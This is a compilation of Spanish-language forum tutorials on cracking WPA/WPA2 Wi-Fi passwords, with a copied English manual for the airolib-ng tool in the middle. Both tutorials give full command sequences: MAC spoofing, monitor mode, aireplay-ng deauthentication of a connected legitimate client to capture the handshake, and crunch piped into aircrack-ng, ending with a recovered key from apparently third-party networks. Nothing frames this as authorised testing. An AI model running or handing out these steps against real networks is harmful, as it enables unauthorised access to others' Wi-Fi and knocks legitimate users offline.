Que weba, que weba, pero dado a que no estoy haciendo mi servicio social de la

universidad pues le dedicare tiempo a hacer mi primer post..

Muchos saben sacar claves wep, osea, quien no? Esas viejas claves en Wired Equivalent
Privacy, que ya hasta les sacaron uns distribucion DSL llamada beini para los webones,
Hazme el reverendo favor.
Otros tantos pocos han investigado y saben sacar o saben los principios basicos del
como hacerse de una clave en WPA, no mather, la idea de este post es la de sacarlos de
la caja donde viven y piensen afuera de esta y avancen utilizando mas la imaginacion.

Algunos saben usar airolib? ya saben las tablas tipo Rainbow tables para probar
muchisimas mas claves por segundo de lo que te permite aircrack con un simple
diccioonario, que si tienen un procesador dual core y 2 GB lo maximo que obtienen son
1200 K/seg. Bueno, sin tanto choro, vamos al grano....


REQUISITOS

librerias aircrack-ng
binarios de crunch password generator
un handshake de una clave WPA
y chingos de paciencia



PASOS


airmon-ng stop wlan0 (detener tu targeta inalambrica, la interfaz puede cambiar "wlan0)

ifconfig wlan0 down (dar de baja la targeta para reconfigurarla)

macchanger --mac 00:11:22:33:44:55 (cambiar el Media Access Controll por uno mas
facil y te agilise los sig. pasos)

iwconfig wlan0 mode monitor (cambiar el modo de la targeta a monitor)


airodump-ng wlan0 (monitorear las seales WI-FI a tu alcanze)
______________________________________________________________________
___________________
EJEMPLO

CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76 F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes
08:76 F:60:3C:E8 00:12:34:56:78:90
______________________________________________________________________
______________________

aireplay-ng -9 wlan0 *OPCIONAL* (hacer examen de inyeccion para ver si estas al
alcanze y poras desautentificar al cliente)
______________________________________________________________________
________________

airodump-ng -c 11 -w dump --bssid 08:76 F:60:3C:E8 wlan0 (estar a la escucha de la
red por si cae un handshake)



## AHORA HAY QUE DESAUTENTIFICAR UN CLIENTE (USUARIO LEGITIMO
Y CONECTADO DE LA RED) PARA OBTENER UN HANDSHAKE, O APRETON
DE MANOS DONDE ESTA LA CLAVE QUE DESPUES SE SACA POR METODO
DE FUERZA BRUTA.

aireplay-ng -0 10 -c 00:12:34:56:78:90 -b 08:76 F:60:3C:E8 -e TELMEX wlan0



DESPUES DE ESO LES APARACERA UNA RESPUESTA COMO ESTA EN LA
VENTANA DE MONITOREO


CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 [HANDSHAKE:00:12:34:56:78:90] <--------
------OJO, CAPTURARON EL 4-WAY HANDSHAKE!

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

08:76 F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX

BSSID STATION PWR Rate Lost Packets Probes
08:76 F:60:3C:E8 00:12:34:56:78:90
_____________________________________________________________________



ya tenemos el handshake con el nombre de dump-01.cap y ahora para romperla tienen
dos opciones, usar crunch para que genere contraseas y hacer pipe directo a aircrack o
crear unas tablas con airolib que son un poco mas rapidas, sin embargo necesitaran un
buen de espacio libre, minimo unos 100 GB, les recomiendo comprarse un disco duro
de 1 TB.


empezamos con crunch + aircrack



si usan backtrack 5 usen estos pasos, si no solo cambien la ruta donde se encuentran sus
binarios de crunch



cd /pentest/passwords/crunch

./crunch 10 12 01234567890 | aircrack-ng /root/dump-01.cap -e TELMEX -w -


#ahora crunch empezara a generar contraseas con los digitos que pusimos en este caso
0123456789 de diez a doce digitos de largo, pueden agregar letras pero las posibilidades
aumentan exponencialmente, y es tardado, y toma un par de dias probar todas esas
posibilidades. DIJE QUE NECESITARIAN PASCIENCIA



## ahora con la suite airolib, aqui necesitaran minimo 100 GB de espacio en su disco,
por que la tabla ocupa un gran espacio. en el anterior no necesitan tener nada de espacio
en su disco.


touch essid.txt (crear archivo de texto llamado essid.txt)

echo TELMEX > essid.txt (escribir en el archivo de texto creado el nombre de la red)

cat essid.txt (leer el archivo de texto para confirmar que se escribio)

airolib-ng wpa --import essid essid.txt (crear la tabla con el nombre wpa e importar el
nombre de la red del archivo de texto que creamos)

#ahora muevanse al directorio donde tienen crunch para correrlo

./crunch 10 10 0123456789 | airolib-ng /root/wpa --import passwd -

#este ultimo paso es para importar las contraseas que generara crunch las cuales seran
en total 100 GIGAS, esto toma algo de tiempo, pero si toman atencion al numero que
corre abajo se daran cuenta que crea una gran cantidad de contraseas probables y
muchisimo mas rapido, tengan pasciencia y esperen.


airolib-ng /root/wpa --stats

airolib-ng /root/wpa --clean all

airolib-ng /root/wpa --batch

airolib-ng /root/wpa -verify all

## ME DIO WEBA EXPLICAR LOS DEMAS PASOS, SOLO HAGANLOS, NO LE
HAGAN AL PANCHO, DESPUES DE ESO ESTARA LISTO LA TABLA CON EL
NOMBRE DE wpa Y PUEDEN PROCEDER A ROMPER LA CLAVE.


aircrack-ng -r /root/wpa dump-01.cap -e TELMEX



MUCHA SUERTE, SI TE GUSTO DEJA TU COMENTARIO SI NO YA SABES
QUE TAMBIEN, DALE A FAVORITOS, ROLALO EN TU MYSPACE,
FACEBOOK, TWITTER, GOOGLE+

"hector leal"

jajajaja


si necesitan ayuda con cualquier cosa avisenme, estoy en tamaulipas y san luis potosi

STARK

s-t-a-r-k@live.com


Airolib-ng
Description
Airolib-ng is an aircrack-ng suite tool designed to store and manage essid and password
lists, compute their Pairwise Master Keys (PMKs) and use them in WPA/WPA2
cracking. The program uses the lightweight SQLite3 database as the storage mechanism
which is available on most platforms. The SQLite3 database was selected taking in
consideration platform availability plus management, memory and disk overhead.
WPA/WPA2 cracking involves calculating the pairwise master key, from which the
private transient key (PTK) is derived. Using the PTK, we can compute the frame
message identity code (MIC) for a given packet and will potentially find the MIC to be
identical to the packet's thus the PTK was correct therefore the PMK was correct as
well.
Calculating the PMK is very slow since it uses the pbkdf2 algorithm. Yet the PMK is
always the same for a given ESSID and password combination. This allows us to pre-
compute the PMK for given combinations and speed up cracking the wpa/wpa2
handshake. Tests have shown that using this technique in aircrack-ng can check more
than 50 000 passwords per second using pre-computed PMK tables.
Computing the PMK is still required, yet we can:
Precompute it for later and/or shared use.
Use distributed machines to generate the PMK and use their value elsewhere.
To learn more about WPA/WPA2:
See the WPA/WPA2 Information section on the wiki links page.
To learn more about coWPAtty:
Will Hack For SUSHI > CoWPAtty
Wireless Defense CoWPAtty writeup
As stated above, this program requires the SQLite3 database environment. You must be
running version 3.3.17 or above. You may obtain the latest version from the SQLite
download page.
Usage
Usage: airolib <database> <operation> [options]
Where:
database is name of the database file. Optionally specify the full path.
operation specifies the action you would like taken on the database. See below for a
complete list.
options may be required depending on the operation specified
Here are the valid operations:
- -stats - Output some information about the database.
- -sql {sql} - Execute the specified SQL statement.
- -clean [all] - Perform steps to clean the database from old junk. The option 'all' will
also reduce file size if possible and run an integrity check.
- -batch - Start batch-processing all combinations of ESSIDs and passwords. This must
be run prior to using the database within aircrack-ng or after you have added
additional SSIDs or passwords.
- -verify [all] - Verify a set of randomly chosen PMKs. If the option 'all' is given, all(!)
PMKs in the database are verified and the incorrect ones are deleted.
- -export cowpatty {essid} {file} - Export to a cowpatty file.
- -import cowpatty {file} - Import a cowpatty file and create the database if it does not
exist.
- -import {essid|passwd} {file} - Import a text flat file as a list of either ESSIDs or
passwords and create the database if it does not exist. This file must contain one essid
or password per line. Lines should be terminated with line feeds. Meaning press
enter at the end of each line when entering the values.
Usage Examples
Here are usage examples for each operation.
Status Operation
Enter:
airolib-ng testdb --stats
Where:
testdb is the name of the database to be created.
- -stats is the operation to be performed.
The system responds:
statsThere are 2 ESSIDs and 232 passwords in the database. 464 out of
464 possible combinations have been computed (100%).

ESSID Priority Done
Harkonen 64 100.0
teddy 64 100.0
SQL Operation
The following example will give the SSID VeryImportantESSID maximum priority.
Enter:
airolib-ng testdb --sql 'update essid set prio=(select min(prio)-1
from essid) where essid="VeryImportantESSID";'
The system responds:
update essid set prio=(select min(prio)-1 from essid) where
essid="VeryImportantESSID";
Query done. 1 rows affected.
The following example will look for very important patterns in the pmk.
Enter:
airolib-ng testdb --sql 'select hex(pmk) from pmk where hex(pmk) like
"%DEADBEEF%"'
The system responds:
hex(pmk)
BF3F122D3CE9ED6C6E7E1D7D13505E0A41EC4C5A3DEADBEEFFEFF597387AFCE3
Clean Operation
To do a basic cleaning, enter:
airolib-ng testdb --clean
The system responds:
cleanDeleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Done.
To do a basic cleaning, reduce the file size if possible and run an integrity check., enter:
airolib-ng testdb --clean all
The system responds:
cleanDeleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.
Batch Operation
Enter:
airolib-ng testdb --batch
The system responds:
Computed 464 PMK in 10 seconds (46 PMK/s, 0 in buffer). No free ESSID
found. Will try determining new ESSID in 5 minutes...
Verify Operation
To verify a 1000 random PMKs, enter:
airolib-ng testdb --verify
The system responds:
verifyChecking ~10.000 randomly chosen PMKs...
ESSID CHECKED STATUS
Harkonen 233 OK
teddy 233 OK
To verify all PMKs, enter:
airolib-ng testdb --verify all
The system responds:
verifyChecking all PMKs. This could take a while...
ESSID PASSWORD PMK_DB CORRECT
Cowpatty table Export Operation
Enter:
airolib-ng testdb --export cowpatty test cowexportoftest
The system responds:
exportExporting...
Done.
Import Operation
SSID
To import an ascii list of SSIDs and create the database if it does not exist, enter:
airolib-ng testdb --import essid ssidlist.txt
Where:
testdb is the name of the database to be updated and it will be created if it does not
exist.
- -import is the operation to be performed.
essid indicates it is a list of SSIDs.
ssidlist.txt is the file name containing the SSIDs. One per line. It can optionally be fully
qualified.
The system responds:
importReading...
Writing...
Done.
Passwords
To import an ascii list of passwords and create the database if it does not exist, enter:
airolib-ng testdb --import passwd password.lst
Where:
testdb is the name of the database to be updated and it will be created if it does not
exist.
- -import is the operation to be performed.
passwd indicates it is a list of passwords.
password.list is the file name. One per line. It can optionally be fully qualified.
The system responds:
importReading...
Writing... read, 1814 invalid lines ignored.
Done.
Cowpatty tables
Imports a cowpatty table and create the database if it does not exist, enter:
airolib-ng testdb --import cowpatty cowexportoftest
Where:
testdb is the name of the database to be updated and it will be created if it does not
exist.
- -import is the operation to be performed.
cowpatty indicates it is a cowpatty table.
cowexportoftest is the file name. One per line. It can optionally be fully qualified.
The system responds:
importReading header...
Reading...
Updating references...
Writing...
Aircrack-ng Usage Example
The ultimate objective is to speed up WPA/WPA2 cracking under aircrack-ng. To use
the tables you have built using airolib-ng then use the -r option to specify the database
containing the pre-calculated PMKs.
Enter:
aircrack-ng -r testdb wpa2.eapol.cap
Where:
-r specifies that a pre-computed PMK database will be used.
testdb is the name of the database file and may optionally be fully qualified.
wpa2.eapol.cap is capture file containing the WPA/WPA2 handshake.
Note: All the other standard options which are applicable to WPA/WPA2 may also be
used. This is a very limited example.
Usage Tips
Creating your own database example
To test the tool yourself
get yourself the sqlite3 library and headers (latest version is recommended)
get yourself the 1.0dev version of the aircrack-ng suite
import an essid, e.g. echo Harkonen | airolib-ng testdb import essid -
Database <testdb> does not already exist, creating it...
Database <testdb> sucessfully created
Reading file...
Writing...
Done.
import a password, e.g. echo 12345678 | airolib-ng testdb import passwd -
Reading file...
Writing...
Done.
start the batch process (airolib-ng testdb batch), wait for it to run out of work, kill it
Computed 1 PMK in 0 seconds (1 PMK/s, 0 in buffer). All ESSID
processed.
Check the database to confirm everything has been computed (airolib-ng testdb
stats)
There are 1 ESSIDs and 1 passwords in the database. 1 out of 1
possible combinations have been computed (100%).

ESSID Priority Done
Harkonen 64 100.0
crack your WPA/WPA2 handshake, e.g. aircrack-ng -r testdb -e Harkonen
wpa2.eapol.cap
KEY FOUND! [ 12345678 ]
Using a sample pre-made database
Another way to test for yourself is to download a pre-made database called
passphrases.db. This file is also located in the test directory of the aircrack-ng sources.
Then try this database with the two test WPA/WPA2 files supplied in the test directory
of the aircrack-ng sources. The WPA/WPA2 test files are called wpa.cap and
wpa2.eapol.cap.
The commands are either of:
aircrack-ng -r passphrases.db wpa.cap
aircrack-ng -r passphrases.db wpa2.eapol.cap
This should give you the passphase. Success indicates that your setup is working
correctly.
Usage Troubleshooting
Enabling Airolib-ng
Airolib-ng is not compiled by default. To enable compiling, do make sqlite=true and
make sqlite=true install.
Compile Error
Although this is not a usage troubleshooting tip, it is a common problem during the
compilation of the 1.0dev version. As a reminder, SQLite must be version 3.3.13 or
above. This is the compile error you receive when your version of SQLite is less then
the requirement:
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -
D_REVISION=`../evalrev` -I/usr/local/include -Iinclude -DHAVE_SQLITE
-c -o airolib-ng.o airolib-ng.c
airolib-ng.c: In function `sql_prepare':
airolib-ng.c:129: warning: implicit declaration of function
`sqlite3_prepare_v2'
make[1]: *** [airolib-ng.o] Error 1
make[1]: Leaving directory `/root/1.0-dev/src'
make: *** [all] Error 2
When is the SQLite patch needed?
The SQLite patch included with aircrack-ng sources is only needed when compiling
under Windows. It is required to remove some elements which will not compile under
windows and are not required.
It is not required for linux installations.
Airolib-ng fails to open or create the database
On windows only, opening/creating a database doesn't work when airolib-ng is in
directories containing special characters like '', '', '', '', (directories containing
spaces are not affected).
The solution is to move airolib-ng and its database in another directory without these
special characters.
"invalid lines ignored" error message
This error message may occur when importing passwords or ESSIDs. It is the number
of records with invalid passwords or ESSIDs lengths. The valid lengths are:
Passwords must have a length of 8 through 63 characters
ESSIDs must have a length of 1 through 32 characters
"Quitting aircrack-ng..." error message
If you subsequently run aircrack-ng and only receive Quitting aircrack-ng then the
ESSID is missing from the database. You need to load it plus rerun the batch option.

CRUNCH

Hace un tiempo me venan pidiendo armar un tutorial sobre cmo crackear redes con cifrados
WPA y WPA2.
Entonces decid por realizar este tuto utilizando una herramienta que reemplaza a los
diccionarios y en mi caso me di bastante efectividad.

Empecemos por dejar en claro un par de cuestiones, la encriptacin WEP como ya sabemos es
fcil de romper, se capturan paquetes para luego por ingeniera inversa crackear esos
paquetes y conseguir la clave.
En el caso de WPA y WPA2 es distinto, el mtodo anterior no puede ser utilizado.
Estos tipos de cifrados utilizan algo llamado "handshake" (apretn de manos), es una especie
de "saludo" entre el AP (Access Point) y el Cliente.
Lo que debemos capturar en este caso justamente es ese handshake para estar en "confianza"
con el AP e intentar mediante un diccionario o en este caso con otro mtodo que utilizo yo,
romper la clave.

Una vez aclarado el funcionamiento, largo el mtodo:

Voy a utilizar un software llamado "crunch"

Vamos a bajarlo desde ac
DESCARGAR CRUNCH


Una vez que lo descargamos, lo descomprimimos:
tar -xvzf crunch*.tgz


Entramos al directorio
cd crunch


Lo compilamos, por las dudas primero dejo el build-essential por si no lo tienen:
apt-get install build-essential


Ahora si, lo compilamos:
make

make install


Por ltimo copiamos el comando al sbin:
cp crunch /usr/sbin/


Voy a dar por sentado que tienen instalado aircrack-ng, pero como soy bueno, les dejo el apt-
get por las dudas:
apt-get install aircrack-ng



Empezamos !!


Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cual
ponga la suya):
airodump-ng ath1


Me aparecen un par de redes:
CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1B:11 3:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007
00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w
00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin
00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys
00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w
00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default
00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED
00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN <length:
00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J
00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA
00:21:29:72 C:32 5 3 0 0 11 54 . WEP WEP linksys
00:0F:A3 1:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA
00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS
00:0F:A3 1:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn
1C:AF 7:42:E1:E6 -1 0 0 0 9 -1 <length:
00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP <length:
00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc
00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt
00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769


Juro que el ESSID PORINGA no es mo !!

Bueno, sigamos, la que voy a utilizar es "default" que tiene cifrado WPA TKIP PSK:

TKIP: (Temporal Key Integrity Protocol)
PSK: (Pre-Shared Key)


Una vez que tenemos el MAC del AP y el canal, ponemos:
airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default ath1


En este caso:
airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1


Ahora airodump slo va a escuchar ese canal y ese AP.:
CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:E7:56:26:89 9 90 4152 762 5 6 54 . WPA TKIP PSK defau

BSSID STATION PWR Rate Lost Packets Probes

00:18:E7:56:26:89 00:0C:41:7A:77:43 51 11 - 1 42 1102
00:18:E7:56:26:89 00:1F:E1:23:33:40 15 0 - 1 0 61 default


Ac tenemos dos posibles escenarios:

1) Esperar que se conecte un nuevo cliente para adquirir el handshake
2) Desautenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake

En este caso vamos a utilizar la segunda opcin, anotamos el MAC del AP y el MAC del cliente
conectado.

AP: 00:18:E7:56:26:89
Cliente Conectado: 00:0C:41:7A:77:43

Procedemos a desautenticar al cliente mediante este comando:
aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE ath1


En este caso:
aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1


Hace algo as:
[root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
23:46:18 Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6
23:46:19 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [14|155 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs]
23:46:26 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [3 186 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|137 ACKs]
23:46:28 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|147 ACKs]
23:46:32 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [19|258 ACKs]


Si no lo desautentifica a la primera, volver a repetir el comando.

Una vez que el usuario es desautenticado y vuelva a ingresar nos va a aparecer arriba a la
derecha el handshake
CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ][ WPA handshake: 00:18:E7:56:26:89


Listo, ya tenemos nuestro handshake, ahora utilizamos el crunch:


Escribimos esto:
crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b
HANDSHAKE -w -


En este caso:
crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b
00:18:E7:56:26:89 -w -


Aclaracin: "crunch 8 9" hace referencia a que las claves WPA como mnimo tienen 8
caracteres, en este caso yo quiero que slo pruebe hasta 9 caracteres, y que utilice los
nmeros 0123456789.
El 75% de los usuarios cometen el error de "securizar" la red con WPA y usar claves numricas,
que en este caso vamos a ver lo fciles que son de conseguir con crunch
Si quisiramos que crunch use letras, pondramos "crunch 8 15 (mximo 15 caracteres)"
abcdefghijklmno"

Ahora vamos a ver como crunch empieza a generar claves y a probarlas con el aircrack-ng:

[root@debian dke]# crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e
default -b 00:18:E7:56:26:89 -w -
Opening /home/dke/default-01.cap
Reading packets, please wait...



Aircrack-ng 1.0 rc3


[00:00:50] 72172 keys tested (1445.33 k/s)


KEY FOUND! [ 00072169 ]


Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0
32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E

Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD
16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94
30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E
E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98

EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D